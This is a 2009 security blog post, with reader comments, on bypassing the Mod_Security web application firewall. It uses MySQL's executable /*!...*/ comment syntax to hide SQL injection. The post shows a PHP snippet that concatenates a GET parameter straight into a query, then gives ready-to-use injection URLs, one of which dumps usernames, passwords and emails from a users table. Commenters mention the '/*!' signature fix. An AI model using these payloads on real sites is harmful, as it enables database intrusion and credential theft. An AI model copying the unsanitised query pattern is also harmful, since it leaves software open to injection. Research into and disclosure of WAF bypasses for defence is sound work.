October 28, 2009

Another fine method to exploit SQL Injection and bypass WAF

A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.

MySQL servers allow one to use comments of the following type:

/*!sql-code*/ and /*!12345sql-code*/

As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.

As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).

Here is a simple example:

...
$query = "SELECT name FROM table where id = ".$_GET[id];

$result = mysql_query($query);
...

If a web application is protected with Mod_Security, then the following request will be forbidden:

/?id=1+union+select+1

It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (HPP/HPF techniques):

/?id=1+union/*&id=*/select+table_name+from+information_schema.columns

/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns


But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:

/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/

Well, one more method to our arsenal :-)
Author at
Tags , , , , , , , , ,

13 comments:

  1. Ivan RistićNovember 3, 2009 at 7:54 AM

    Nice catch. It's easy to defend against, though -- just look for the "/*!" sequence in input.

    ReplyDelete
  2. MikeNovember 3, 2009 at 10:28 AM

    Additionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for "/*!".

    Thanks for the great article and work.

    ReplyDelete
  3. Brian RectanusNovember 3, 2009 at 11:43 AM

    I believe that 2.5.10 rules catch this (CRS v2.0.2). Thanks!

    ReplyDelete
  4. patrickMarch 16, 2010 at 11:48 PM

    Thank you for this template...... web application

    ReplyDelete
  5. vijay seoJune 24, 2010 at 4:35 AM

    This comment has been removed by the author.

    ReplyDelete
  6. 3D AnimationNovember 2, 2011 at 11:54 PM

    I am impressed by the quality of information on this website. There are a lot of good resources here. Video Marketing
    App Marketing

    ReplyDelete
  7. JohnMay 12, 2012 at 11:37 PM

    Thanks for sharing informative post. Mobile application development | Software Development Company

    ReplyDelete
  8. Car Dealer IslandJune 7, 2012 at 4:42 AM

    Conveyed a complex material in a simple manner. Great job. Hendrick Honda Of Charleston

    ReplyDelete
  9. Aishwarya Rai ActressAugust 18, 2012 at 6:29 AM

    This is a really great post, thanks for sharing. I’m glad I got a chance to check out your blog!
    thanks,
    aishwarya actress

    ReplyDelete
  10. Deny JeuxApril 10, 2016 at 7:55 AM

    This comment has been removed by a blog administrator.

    ReplyDelete
  11. Milad ZalaghiMay 29, 2016 at 2:33 AM

    This comment has been removed by a blog administrator.

    ReplyDelete
  12. chenliliJune 3, 2016 at 6:03 PM

    This comment has been removed by a blog administrator.

    ReplyDelete
  13. Mehri ZalaghiJune 29, 2016 at 7:07 AM

    This comment has been removed by a blog administrator.

    ReplyDelete

Subscribe to: Post Comments (Atom)